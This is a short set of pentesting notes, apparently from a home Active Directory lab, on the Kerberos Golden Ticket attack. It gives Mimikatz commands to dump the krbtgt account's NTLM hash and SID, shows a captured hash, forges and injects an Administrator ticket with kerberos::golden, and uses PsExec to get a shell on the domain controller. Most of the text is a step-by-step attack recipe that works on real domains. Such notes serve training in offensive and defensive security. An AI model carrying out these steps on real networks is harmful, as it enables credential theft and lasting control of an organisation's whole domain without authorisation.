krbtgt
account, we own the domainAttack | Description | When to Use |
---|---|---|
Golden Ticket | Creates a forged TGT (Ticket Granting Ticket) that grants domain-wide access for up to 10 years. | When you have krbtgt hash and want persistent access to the domain. |
Pass-the-Ticket (PtT) | Uses a stolen valid TGT or TGS (Service Ticket) to authenticate as a user without needing a password. | When you have an extracted TGT or TGS and want lateral movement without dumping credentials. |
Login to Domain Controller (Server) and open CMD as administrator
Use Mimikatz to pull down the krbtgt
account
lsadump::lsa /inject /name:krbtgt
Grab the SID and NTLM hash to generate the Golden Ticket
S-1-5-21-2828008126-1612423536-1023625581
e5efba889e477a42ce92a08a552388d6
Generate Golden Ticket
kerberos::golden /User:Administrator /domain:MARVEL.local /sid:S-1-5-21-2828008126-1612423536-1023625581 /krbtgt:e5efba889e477a42ce92a08a552388d6 /id:500 /ptt
/User
: Can be a fake user/domain
: Must be a real domain/sid
: SID/krbtgt
: NTLM Hash/id
: The RID of user, 500 for administrator (See NTLM hash)/ptt
: Pass the ticketSpawn a new command prompt
misc::cmd
misc::cmd
command is used to spawn a new command prompt (cmd.exe) with the injected Kerberos ticket, allowing you to use the forged credentials for authentication within that session.Use Domain Privileges
Use psexec.exe
to get a shell
PsExec.exe \\\\THEPUNISHER cmd.exe